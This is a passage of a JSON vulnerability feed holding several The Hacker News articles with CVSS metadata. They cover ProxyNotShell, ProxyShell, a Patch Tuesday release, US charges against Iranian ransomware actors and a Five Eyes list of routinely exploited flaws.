vulnerabilities could grant an outsider attacker the ability to read emails directly off an organization's server the ability to breach the organization with CVE-2022-41040 Remote Code Execution and implant malware on the organization's Exchange Server with CVE-2022-41082.\n\nThough it appears that attackers would need some level of authentication to activate the chained vulnerabilities exploit, the exact level of authentication required \u2013 rated \"Low\" by Microsoft \u2013 is not yet clarified. Yet, this required low authentication level should effectively prevent a massive, automated attack targeting every Exchange server around the globe. This hopefully will prevent a replay of the 2021 ProxyShell debacle.\n\nYet, finding a single valid email address/password combination on a given Exchange server should not be overly difficult, and, as this attack bypasses MFA or FIDO token validation to log into Outlook Web Access, a single compromised email address/password combination is all that is needed.\n\n## Mitigating ProxyNotShell Exposure\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure of unknown efficacy.\n\nBlocking incoming traffic to Exchange Servers holding critical asserts is also an option, though only practicable if such a measure does not impact vital operations and should ideally be perceived as a temporary measure pending Microsoft's issuance of a verified patch.\n\n## Assessing ProxyNotShell Exposure\n\nAs the current mitigation options are either of unverified efficacy or potentially damaging to the smooth running of operations, evaluating the degree of exposure to ProxyNotShell might prevent taking potentially disruptive unnecessary preventative measures, or indicate which assets to preemptively migrate to unexposed servers.\n\nCymulate Research Lab has developed a [custom-made assessment for ProxyNotShell](<https://cymulate.com/free-trial/>) that enable organizations to estimate exactly their degree of exposure to ProxyNotShell.\n\nA ProxyNotShell attack vector has been added to the advanced scenarios templates, and running it on your environment yields the necessary information to validate exposure \u2013 or lack thereof - to ProxyNotShell.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgOoxz7w2_H46l72-JIWEEozP6gnLHfSQt_wbm1RRkjB0NOn2rBaB0wW4-jBFx4wbMgPAmXZvOdPPwjnUFX2u8zbdJZLSXKMAoft6Skt3EXk_gH1ehXK9DLBpHKouidVH9WE9P1SQs3h-s1VAfGKtHqeXaxkjtGS4lDIItWgmQo1FSLk_6z6fV7ZtQw/s728-e100/222.png>)\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiqGWTwc-0vwEKrwSp1s7coId4IRI3KelQKVBG1iXsx0N32996O0Lprr0PA035V1oLkFpdjQ1euXlqcL0le7gsuWoWI9NSCEBW0Nj-OCQZn8ovDyuK-b-MtVYhjKmGIWuZO5IkdqNRBvKSiWttxGP46GmxjlZtpI_FSz2728WiqkvKTOoOJIp0KrjOH/s728-e100/111.png>)\n\nUntil verified patches are available from Microsoft, assessing exposure to ProxyNotShell to evaluate exactly which servers are potential targets is the most cost-efficient way to evaluate exactly which assets are exposed and devise targeted preemptive measures with maximum impact.\n\n_Note: This article is contributed by [Cymulate Research Labs](<https://cymulate.com/>)._\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T08:05:00", "type": "thn", "title": "ProxyNotShell \u2013 the New Proxy Hell?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T10:19:04", "id": "THN:54023E40C0AA4CB15793A39F3AF102AB", "href": "https://thehackernews.com/2022/10/proxynotshell-new-proxy-hell.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:04", "description": "[](<https://thehackernews.com/images/-mqB1LJpewfs/YJuapEGzrpI/AAAAAAAAChc/PMqXgSaopa04nju1H68tJ4fqClZ3HLdKgCLcBGAsYHQ/s0/windows-update.jpg>)\n\nMicrosoft on Tuesday rolled out its scheduled [monthly security update](<https://msrc.microsoft.com/update-guide/releaseNote/2021-May>) with patches for 55 security flaws affecting Windows, Exchange Server, Internet Explorer, Office, Hyper-V, Visual Studio, and Skype for Business.\n\nOf these 55 bugs, four are rated as Critical, 50 are rated as Important, and one is listed as Moderate in severity. Three of the vulnerabilities are publicly known, although, unlike [last month](<https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html>), none of them are under active exploitation at the time of release.\n\nThe most critical of the flaws addressed is [**CVE-2021-31166**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166>), a wormable remote code execution vulnerability in the HTTP protocol stack. The issue, which could allow an unauthenticated attacker to send a specially crafted packet to a targeted server, is rated 9.8 out of a maximum of 10 on the CVSS scale.\n\nAnother vulnerability of note is a remote code execution flaw in Hyper-V ([**CVE-2021-28476**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28476>)), which [also scores](<https://thehackernews.com/>) the highest severity among all flaws patched this month with a CVSS rating of 9.9.\n\n\"This issue allows a guest VM to force the Hyper-V host's kernel to read from an arbitrary, potentially invalid address,\" Microsoft said in its advisory. \"The contents of the address read would not be returned to the guest VM. In most circumstances, this would result in a denial of service of the Hyper-V host (bugcheck) due to reading an unmapped address.\"\n\n\"It is possible to read from a memory mapped device register corresponding to a hardware device attached to the Hyper-V host which may trigger additional, hardware device specific side effects that could compromise the Hyper-V host's security,\" the Windows maker noted.\n\nIn addition, the Patch Tuesday update addresses a scripting engine memory corruption flaw in Internet Explorer ([**CVE-2021-26419**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26419>)) and four weaknesses in Microsoft Exchange Server, marking the third consecutive month Microsoft has shipped fixes for the product since [ProxyLogon exploits](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) came to light in March \u2014\n\n * [**CVE-2021-31207**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>) (CVSS score: 6.6) - Security Feature Bypass Vulnerability (publicly known)\n * [**CVE-2021-31195**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31195>) (CVSS score: 6.5) - Remote Code Execution Vulnerability\n * [**CVE-2021-31198**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31198>) (CVSS score: 7.8) - Remote Code Execution Vulnerability\n * [**CVE-2021-31209**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31209>) (CVSS score: 6.5) - Spoofing Vulnerability\n\nWhile CVE-2021-31207 and CVE-2021-31209 were demonstrated at the [2021 Pwn2Own contest](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>), Orange Tsai from DEVCORE, who disclosed the ProxyLogon Exchange Server vulnerability, is credited with reporting CVE-2021-31195.\n\nElsewhere, the update addresses a slew of privilege escalation bugs in Windows Container Manager Service, an information disclosure vulnerability in Windows Wireless Networking, and several remote code execution flaws in Microsoft Office, Microsoft SharePoint Server, Skype for Business, and Lync, Visual Studio, and Windows Media Foundation Core.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-12T09:15:00", "type": "thn", "title": "Latest Microsoft Windows Updates Patch Dozens of Security Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26419", "CVE-2021-28476", "CVE-2021-31166", "CVE-2021-31195", "CVE-2021-31198", "CVE-2021-31207", "CVE-2021-31209"], "modified": "2021-05-12T09:15:56", "id": "THN:25143CA85A0297381CEBBBD35F24F85B", "href": "https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-16T04:03:41", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjUqmffIx48KtQdHxTXb4TQfvElel4yvoLc_Uq-nF3atp_DnKXEvX_r4s4FR-V9kItxokvkUgH3L-QP1uH3JrII_VtRNnXYXU3EYxwsreIbOgCkHKHN4AbWxtUPY5tKaH8u6YvYBd2oA_JReHSU1gNdaKY11tzzrlCHhUSTJzZr4yGRgnN-fUCAb2Mv/s728-e100/iranian-hackers.jpg>)\n\nThe U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020.\n\nThe agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked under the names APT35, Charming Kitten, Nemesis Kitten, Phosphorus, and TunnelVision.\n\n\"This group has launched extensive campaigns against organizations and officials across the globe, particularly targeting U.S. and Middle Eastern defense, diplomatic, and government personnel, as well as private industries including media, energy, business services, and telecommunications,\" the Treasury [said](<https://home.treasury.gov/news/press-releases/jy0948>).\n\nThe Nemesis Kitten actor, which is also known as [Cobalt Mirage](<https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html>), [DEV-0270](<https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html>), and [UNC2448](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>), has come under the scanner in recent months for its pattern of ransomware attacks for opportunistic revenue generation using Microsoft's built-in BitLocker tool to encrypt files on compromised devices.\n\nMicrosoft and Secureworks have characterized DEV-0270 as a subgroup of [Phosphorus](<https://thehackernews.com/2022/09/iranian-hackers-target-high-value.html>) (aka Cobalt Illusion), with ties to another actor referred to as [TunnelVision](<https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html>). The Windows maker also assessed with low confidence that \"some of DEV-0270's ransomware attacks are a form of moonlighting for personal or company-specific revenue generation.\"\n\nWhat's more, independent analyses from the two cybersecurity firms as well as Google-owned [Mandiant](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>) has revealed the group's connections to two companies Najee Technology (which functions under the aliases Secnerd and Lifeweb) and Afkar System, both of which have been subjected to U.S. sanctions.\n\nIt's worth noting that Najee Technology and Afkar System's connections to the Iranian intelligence agency were first flagged by an anonymous anti-Iranian regime entity called [Lab Dookhtegan](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>) [earlier](<https://mobile.twitter.com/LabDookhtegan2/status/1520355269695442945>) this [year](<https://mobile.twitter.com/LabDookhtegan2/status/1539960629867401218>).\n\n\"The model of Iranian government intelligence functions using contractors blurs the lines between the actions tasked by the government and the actions that the private company takes on its own initiative,\" Secureworks said in a [new report](<https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors>) detailing the activities of Cobalt Mirage.\n\nWhile exact links between the two companies and IRGC remain unclear, the method of private Iranian firms acting as fronts or providing support for intelligence operations is well established over the years, including that of [ITSecTeam (ITSEC), Mersad](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>), [Emennet Pasargad](<https://thehackernews.com/2021/11/us-charged-2-iranians-hackers-for.html>), and [Rana Intelligence Computing Company](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>).\n\nOn top of that, the Secureworks probe into a June 2022 Cobalt Mirage incident showed that a PDF file containing the ransom note was created on December 17, 2021, by an \"Ahmad Khatibi\" and timestamped at UTC+03:30 time zone, which corresponds to the Iran Standard Time. Khatibi, incidentally, happens to be the CEO and owner of the Iranian company Afkar System.\n\nAhmad Khatibi Aghda is also part of the 10 individuals sanctioned by the U.S., alongside Mansour Ahmadi, the CEO of Najee Technology, and other employees of the two enterprises who are said to be complicit in targeting various networks globally by leveraging well-known security flaws to gain initial access to further follow-on attacks.\n\nSome of the [exploited flaws](<https://www.cisa.gov/uscert/ncas/alerts/aa22-257a>), according to a [joint cybersecurity advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/14/iranian-islamic-revolutionary-guard-corps-affiliated-cyber-actors>) released by Australia, Canada, the U.K., and the U.S., as part of the IRGC-affiliated actor activity are as follows -\n\n * Fortinet FortiOS path traversal vulnerability ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>))\n * Fortinet FortiOS default configuration vulnerability ([CVE-2019-5591](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * Fortinet FortiOS SSL VPN 2FA bypass vulnerability ([CVE-2020-12812](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), and\n * [Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) (CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105)\n\n\"Khatibi is among the cyber actors who gained unauthorized access to victim networks to encrypt the network with BitLocker and demand a ransom for the decryption keys,\" the U.S. government said, in addition to adding him to the FBI's [Most Wanted list](<https://www.fbi.gov/wanted/cyber/ahmad-khatibi-aghda>).\n\n\"He leased network infrastructure used in furtherance of this malicious cyber group's activities, he participated in compromising victims' networks, and he engaged in ransom negotiations with victims.\"\n\nCoinciding with the sanctions, the Justice Department separately [indicted](<https://www.justice.gov/usao-nj/pr/three-iranian-nationals-charged-engaging-computer-intrusions-and-ransomware-style>) Ahmadi, Khatibi, and a third Iranian national named Amir Hossein Nickaein Ravari for engaging in a criminal extortion scheme to inflict damage and losses to victims located in the U.S., Israel, and Iran.\n\nAll three individuals have been charged with one count of conspiring to commit computer fraud and related activity in connection with computers; one count of intentionally damaging a protected computer; and one count of transmitting a demand in relation to damaging a protected computer. Ahmadi has also been charged with one more count of intentionally damaging a protected computer.\n\nThat's not all. The U.S. State Department has also [announced monetary rewards](<https://www.state.gov/sanctioning-iranians-for-malicious-cyber-acts/>) of up to $10 million for any information about [Mansour, Khatibi, and Nikaeen](<https://rewardsforjustice.net/index/?jsf=jet-engine:rewards-grid&tax=cyber:3266>) and their whereabouts.\n\n\"These defendants may have been hacking and extorting victims \u2013 including critical infrastructure providers \u2013 for their personal gain, but the charges reflect how criminals can flourish in the safe haven that the Government of Iran has created and is responsible for,\" Assistant Attorney General Matthew Olsen said.\n\nThe development comes close on the heels of [sanctions](<https://thehackernews.com/2022/09/us-imposes-new-sanctions-on-iran-over.html>) imposed by the U.S. against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-15T06:49:00", "type": "thn", "title": "U.S. Charges 3 Iranian Hackers and Sanctions Several Others Over Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-09-16T03:17:57", "id": "THN:802C6445DD27FFC7978D22CC3182AD58", "href": "https://thehackernews.com/2022/09/us-charges-3-iranian-hackers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[](<https://thehackernews.com/images/-4bW5O7qDy3g/YRY939zQM4I/AAAAAAAADho/RUV3iIGj654Ml8xKhGo8MXIEWtGwsL1ywCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nThreat actors are actively carrying out opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year.\n\nThe remote code execution flaws have been collectively dubbed \"ProxyShell.\" At least 30,000 machines are affected by the vulnerabilities, [according](<https://isc.sans.edu/diary/27732>) to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center.\n\n\"Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,\" NCC Group's Richard Warren [tweeted](<https://twitter.com/buffaloverflow/status/1425831100157349890>), noting that one of the intrusions resulted in the deployment of a \"C# aspx webshell in the /aspnet_client/ directory.\"\n\nPatched in early March 2021, [ProxyLogon](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server that permits an attacker to take control of a vulnerable server as an administrator, and which can be chained with another post-authentication arbitrary-file-write vulnerability, CVE-2021-27065, to achieve code execution.\n\nThe vulnerabilities came to light after Microsoft [spilled the beans](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) on a Beijing-sponsored hacking operation that leveraged the weaknesses to strike entities in the U.S. for purposes of exfiltrating information in what the company described as limited and targeted attacks.\n\nSince then, the Windows maker has fixed six more flaws in its mail server component, two of which are called [ProxyOracle](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-2-ProxyOracle/>), which enables an adversary to recover the user's password in plaintext format.\n\nThree other issues \u2014 known as ProxyShell \u2014 could be abused to bypass ACL controls, elevate privileges on Exchange PowerShell backend, effectively authenticating the attacker and allowing for remote code execution. Microsoft noted that both CVE-2021-34473 and CVE-2021-34523 were inadvertently omitted from publication until July.\n\n**ProxyLogon:**\n\n * [**CVE-2021-26855**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26857**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26858**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-27065**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n\n**ProxyOracle:**\n\n * [**CVE-2021-31195**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on May 11)\n * [**CVE-2021-31196**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on July 13)\n\n**ProxyShell:**\n\n * [**CVE-2021-31207**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \\- Microsoft Exchange Server Security Feature Bypass Vulnerability (Patched on May 11)\n * [**CVE-2021-34473**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on April 13, advisory released on July 13)\n * [**CVE-2021-34523**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on April 13, advisory released on July 13)\n\n**Other:**\n\n * [**CVE-2021-33768**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33768>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on July 13)\n\nOriginally demonstrated at the [Pwn2Own hacking competition](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) this April, technical details of the ProxyShell attack chain were disclosed by DEVCORE researcher Orange Tsai at the [Black Hat USA 2021](<https://www.blackhat.com/us-21/briefings/schedule/index.html#proxylogon-is-just-the-tip-of-the-iceberg-a-new-attack-surface-on-microsoft-exchange-server-23442>) and [DEF CON](<https://www.youtube.com/watch?v=5mqid-7zp8k>) security conferences last week. To prevent exploitation attempts, organizations are highly recommended to install updates released by Microsoft.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-13T09:46:00", "type": "thn", "title": "Hackers Actively Searching for Unpatched Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-33768", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-13T09:46:09", "id": "THN:FA40708E1565483D14F9A31FC019FCE1", "href": "https://thehackernews.com/2021/08/hackers-actively-searching-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-04T08:27:53", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoBeYlJXEHlGr6rAJniL2XD4Ma4efotehIvHqoBelnDjYCGmj8xiT_Ywd1KZ4ib2iPE9jPLa0Pm_4yinuBV4dFS1DU6tYFmtWc8MCdQ0JAX1qTBXY6Airy55EM3rJtfcw5XqbClVD4K7dX5ocGZfUZHAalQRMYv6Ujka3fZWMc6HDW2AIMvXuZB6SsXGos/s728-e365/flaws.jpg>)\n\nA four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022.\n\n\"In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems,\" cybersecurity and intelligence agencies from the Five Eyes nations, which comprises Australia, Canada, New Zealand, the U.K., and the U.S., [said](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>) in a joint alert.\n\nThe continued weaponization of [CVE-2018-13379](<https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html>), which was also one among the most exploited bugs in [2020](<https://thehackernews.com/2021/07/top-30-critical-security.html>) and [2021](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>), suggests a failure on the part of organizations to apply patches in a timely manner, the authorities said.\n\n\"Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs,\" according to the advisory. \"While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years.\"\n\n[](<https://thn.news/edWGl41h> \"Cybersecurity\" )\n\n[CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>) refers to a path traversal defect in the FortiOS SSL VPN web portal that could allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.\n\nSome of other widely exploited flaws include:\n\n * [CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) (ProxyShell)\n * [CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) (Unauthenticated remote code execution in Zoho ManageEngine ADSelfService Plus)\n * [CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (Unauthenticated remote code execution in Atlassian Confluence Server and Data Center)\n * [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) (Log4Shell)\n * [CVE-2022-22954](<https://thehackernews.com/2022/05/vmware-releases-patches-for-new.html>) (Remote code execution in VMware Workspace ONE Access and Identity Manager)\n * [CVE-2022-22960](<https://thehackernews.com/2022/05/vmware-releases-patches-for-new.html>) (Local privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation)\n * [CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>) (Unauthenticated remote code execution in F5 BIG-IP)\n * [CVE-2022-30190](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) (Follina)\n * [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) (Unauthenticated remote code execution in Atlassian Confluence Server and Data Center)\n\n\"Attackers generally see the most success exploiting known vulnerabilities within the first two years of public disclosure and likely target their exploits to maximize impact, emphasizing the benefit of organizations applying security updates promptly,\" the U.K.'s National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/ncsc-allies-reveal-2022-common-exploited-vulnerabilities>).\n\n\"Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations),\" the agencies noted.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-04T07:02:00", "type": "thn", "title": "Major Cybersecurity Agencies Collaborate to Unveil 2022's Most Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 